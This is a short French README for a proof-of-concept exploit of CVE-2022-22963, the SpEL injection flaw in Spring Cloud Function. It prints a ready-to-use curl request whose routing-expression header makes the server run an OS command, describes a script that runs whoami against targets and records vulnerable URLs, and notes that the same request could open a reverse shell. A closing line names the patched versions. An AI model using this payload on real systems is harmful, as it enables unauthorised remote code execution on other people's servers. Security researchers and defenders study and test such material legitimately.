
Exploit de preuve de concept pour CVE-2022-22963 (injection SpEL dans Spring Cloud Function) avec script de détection et génération de payload RCE basée sur curl.
CVE-2022-22963 PoC
Légèrement modifié pour la traduction en anglais et la détection de https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . Par défaut, whoami est exécuté sur la cible et un fichier vulnerable.txt est créé avec les URL vulnérables.
Exploiter la vulnérabilité est assez facile à réaliser. Voici la commande curl pour exploiter la vulnérabilité.
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Avec ce curl, il est trivial de créer un fichier sur le système d'exploitation, mais cela pourrait être utilisé pour ouvrir un shell inversé sur l'hôte ou le conteneur vulnérable.
Si vous êtes impacté par CVE-2022-22963, vous devez mettre à jour l'application vers les dernières versions 3.1.7 et 3.2.3.
https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52